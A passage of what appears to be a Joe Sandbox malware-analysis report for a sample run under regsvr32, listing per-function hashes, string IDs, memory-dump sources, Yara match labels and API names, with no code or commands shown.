                                                                                                                                                • Instruction ID: 1312c958b194fd8927f4df16d40f76c6e8e96146428ab2d434b36b7ba69fe2e8
                                                                                                                                                • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                                                                                                • Instruction Fuzzy Hash: 1E217172B0C68AC7EB689B26D9593EA7390FF88B49F004635C71D47695DF3CE494C620
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3731964398-0
                                                                                                                                                • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                                • Instruction ID: ef3a7c9e28b68ab044b995e4083eb4154c70bcd0b8eb313c4244a40e6d101054
                                                                                                                                                • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                                                                                                • Instruction Fuzzy Hash: 9421B072B1C699C6DB28CB22D4593EA73A0FB88B88F404635DA5D47354CF3CE554C720
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$Y}
                                                                                                                                                • API String ID: 0-941771097
                                                                                                                                                • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                                • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                                                                                                • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                                                                                                • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 7;}~$?C
                                                                                                                                                • API String ID: 0-2633536567
                                                                                                                                                • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                                • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                                                                                                • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                                                                                                • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 5"*$Wu
                                                                                                                                                • API String ID: 0-3407213400
                                                                                                                                                • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                                • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                                                                                                • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                                                                                                • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: F/|$]M
                                                                                                                                                • API String ID: 0-4182351379
                                                                                                                                                • Opcode ID: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                                • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                                                                                                • Opcode Fuzzy Hash: 43b00b6be08a8afbf3f5eb28955fc8fd0982218358cdb9bdb13e45d672a344d5
                                                                                                                                                • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ;SH$nK
                                                                                                                                                • API String ID: 0-1681473137
                                                                                                                                                • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                                • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                                                                                                • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                                                                                                • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ,$z
                                                                                                                                                • API String ID: 0-3532108746
                                                                                                                                                • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                                • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                                                                                                • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                                                                                                • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: g/?$~l;
                                                                                                                                                • API String ID: 0-1448562259
                                                                                                                                                • Opcode ID: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                                                • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                                                                                                • Opcode Fuzzy Hash: c1035f7af6a4496562a9c3e7f8bb9bdabded1ee22b21e9d05eb711cf1176ed3d
                                                                                                                                                • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: JM$S
                                                                                                                                                • API String ID: 0-422059844
                                                                                                                                                • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                                • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                                                                                                • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                                                                                                • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: \4t$sT>
                                                                                                                                                • API String ID: 0-514966222
                                                                                                                                                • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                                • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                                                                                                • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                                                                                                • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 6 zT$lh
                                                                                                                                                • API String ID: 0-3667112246
                                                                                                                                                • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                                • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                                                                                                • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                                                                                                • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 2Q'$t<p
                                                                                                                                                • API String ID: 0-2959822804
                                                                                                                                                • Opcode ID: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                                                • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                                                                                                • Opcode Fuzzy Hash: 3a858c916c0ce97b4f34a75536e8983d6f889f87815844e5a642c7b43e21a109
                                                                                                                                                • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 95s$\`s
                                                                                                                                                • API String ID: 0-3495284040
                                                                                                                                                • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                                • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
                                                                                                                                                • Opcode Fuzzy Hash: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                                                                                                • Instruction Fuzzy Hash: 1351D47011478A8BCB48DF28C896ADE3FA1FB58348F114618FC668B264C7B4E665CBC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 3*$qMu
                                                                                                                                                • API String ID: 0-4093015089
                                                                                                                                                • Opcode ID: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                                • Instruction ID: 306475205ddf6f42a3ecfe0a1797163739854d195c0d735865f936de0d0f8307
                                                                                                                                                • Opcode Fuzzy Hash: 99b9b50685954fc4be39463e85dd78448f0e0771904def200121889666665086
                                                                                                                                                • Instruction Fuzzy Hash: 445122B09147189BCB88CFA8E4CA9CDBBF1FF48354F609119F806A7255DB709984CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #X$"n&E
                                                                                                                                                • API String ID: 0-1188898577
                                                                                                                                                • Opcode ID: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                                • Instruction ID: 5f040a851564d75eb680569e00f78a68740ad3a482e782991b4ea7036c242a73
                                                                                                                                                • Opcode Fuzzy Hash: 718f7bd1d94c81876eaad6eeab3da3c9f3f95e6ba8e740bb3013068cec68a803
                                                                                                                                                • Instruction Fuzzy Hash: 3851CEB190038E8FCB48DF68D8865DE7BB1FB48344F018A1DE866AB250D7B4D665CB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Bw~$fy
                                                                                                                                                • API String ID: 0-1663007907
                                                                                                                                                • Opcode ID: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                                • Instruction ID: 54d1d0e0fa6abfe6c6c31828b0edda1727153ea8c56c584fcf89706de6b20d2b
                                                                                                                                                • Opcode Fuzzy Hash: e7fa569085818704a3ff5c3485105d547b9a4184ddd82cedce935b50235ecc40
                                                                                                                                                • Instruction Fuzzy Hash: FC51D2B090038A8FCB48CF64C88A5DE7FB1FB48348F51861DFC26AA250D3B4D664CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: /0$XyLe
                                                                                                                                                • API String ID: 0-3562702181
                                                                                                                                                • Opcode ID: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                                • Instruction ID: 167cd3e3c855d70dfa0c36df1993a56b415187eb75226b1b3cef09056e291559
                                                                                                                                                • Opcode Fuzzy Hash: fef052e2a4848d8a0e8164d690a85092e4079079a61ad40d2a1be71e95784dc9
                                                                                                                                                • Instruction Fuzzy Hash: 5751C2B090034E8FDB48DF68C49A5DE7FB0FB68398F20421DE856A6250D37496A4CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: >I$>I
                                                                                                                                                • API String ID: 0-3948471910
                                                                                                                                                • Opcode ID: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                                • Instruction ID: a225938552342fdcd3306cc52f41137c6a5b776406488479516cfafb05d577e3
                                                                                                                                                • Opcode Fuzzy Hash: d02b05b08f34d440a9e97d41a427d6483b203c28eb04f5a8f30793fc226f53c2
                                                                                                                                                • Instruction Fuzzy Hash: 8D41F0B0909B849BC788DF68C18A90AFBE0FBD8704F505A1DF5858B660DBB4D806CF42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: {H2}$}i#c
                                                                                                                                                • API String ID: 0-1724349491
                                                                                                                                                • Opcode ID: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                                • Instruction ID: 37d5b784c44c013357b808598ceb46bd6ed98c7a9730d3ab63b6bf10ba55f6e5
                                                                                                                                                • Opcode Fuzzy Hash: 636373f8d11797f15735a76cf3eff043eb60bc28cc3023d18146d874f48b2676
                                                                                                                                                • Instruction Fuzzy Hash: 3941EAB190078A8BCF48CF68C89A1DE7BB1FB58358F11461DE866A6250D3B49664CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4V$so
                                                                                                                                                • API String ID: 0-1060102820
                                                                                                                                                • Opcode ID: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                                • Instruction ID: d444a7ea2620fcfa6eb466004a6e01db215641729881944e94261e2193751ac2
                                                                                                                                                • Opcode Fuzzy Hash: d1e906d6139717c906ceb034d8d33f13f0a3d2bdb8d940195440e7af4bdcba37
                                                                                                                                                • Instruction Fuzzy Hash: 8E41BEB180034A8FCB48CF64C88A5DE7FB1FB68398F104619E859A6250D3B4D6A5CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: F+'$O$
                                                                                                                                                • API String ID: 0-4064122715
                                                                                                                                                • Opcode ID: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                                • Instruction ID: be1e2e71df6ebfdb4da32f29d75cc371dd40c0bd5c05f395d23934970efaee37
                                                                                                                                                • Opcode Fuzzy Hash: 2ce923b60eb562ae85959f621386450c4d7366c85186967bb9bba02107a4a539
                                                                                                                                                • Instruction Fuzzy Hash: FD41D6705187848BD3A9DF68C08965EFBF0FB96394F104A1CF68686670C7B6D849CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 1$bO6
                                                                                                                                                • API String ID: 0-3242911120
                                                                                                                                                • Opcode ID: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                                • Instruction ID: 6601c978ba2416544a7d1ca6fb5225a3b879728eb772ccf04003f68ee897128b
                                                                                                                                                • Opcode Fuzzy Hash: 9f75d9841d56aa2cc22d310afbf4e4cd48e2e3da52340bc691d74cf5e049a536
                                                                                                                                                • Instruction Fuzzy Hash: 8A3107701187449FC7A8DF68C086A5ABBF0FB9A354F50491DF686C7265C3B2D895CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )j-J$\rba
                                                                                                                                                • API String ID: 0-105394296
                                                                                                                                                • Opcode ID: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                                • Instruction ID: 842adb91478ed39572f9e8a80903ac0de563c5eb9e26d75e48c1d2cd82a83531
                                                                                                                                                • Opcode Fuzzy Hash: b27fa7590f58ca7dd2d737508af6f5bc0d6ebd07140c48d4a736306249910364
                                                                                                                                                • Instruction Fuzzy Hash: 1A31D17080024E8BDF88DF64D48A6DFBFF0FB58788F205219E856A6254D7749694CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 5T$7c
                                                                                                                                                • API String ID: 0-2666566123
                                                                                                                                                • Opcode ID: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                                • Instruction ID: ee04dda3efe5c9a307f88871a109fd0823ba75d09644cdd26569aa81abafae9d
                                                                                                                                                • Opcode Fuzzy Hash: 2ae419eb0ff386ee94a2b0b54af6030ef829be62021f352e0c4a6905d27011e8
                                                                                                                                                • Instruction Fuzzy Hash: 7631E2B051C7808BC358DF68D15A51BFBF1BBCA748F50891CF686866A0D7B6D818CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ",)x$PX
                                                                                                                                                • API String ID: 0-926260526
                                                                                                                                                • Opcode ID: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                                • Instruction ID: d5a1e783bdd82888163cb93820b1a52157f2f65bb265271905f807ea8b7abae1
                                                                                                                                                • Opcode Fuzzy Hash: f165c3a10a1fa821f16c68d8465b247d8270816cceff94c6b22525474e7640ac
                                                                                                                                                • Instruction Fuzzy Hash: DA31A1B091434E8FCB48DF64C88A5DE7FF0FB58398F114619E85AA6250D3B89694CFC5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2299586839-0
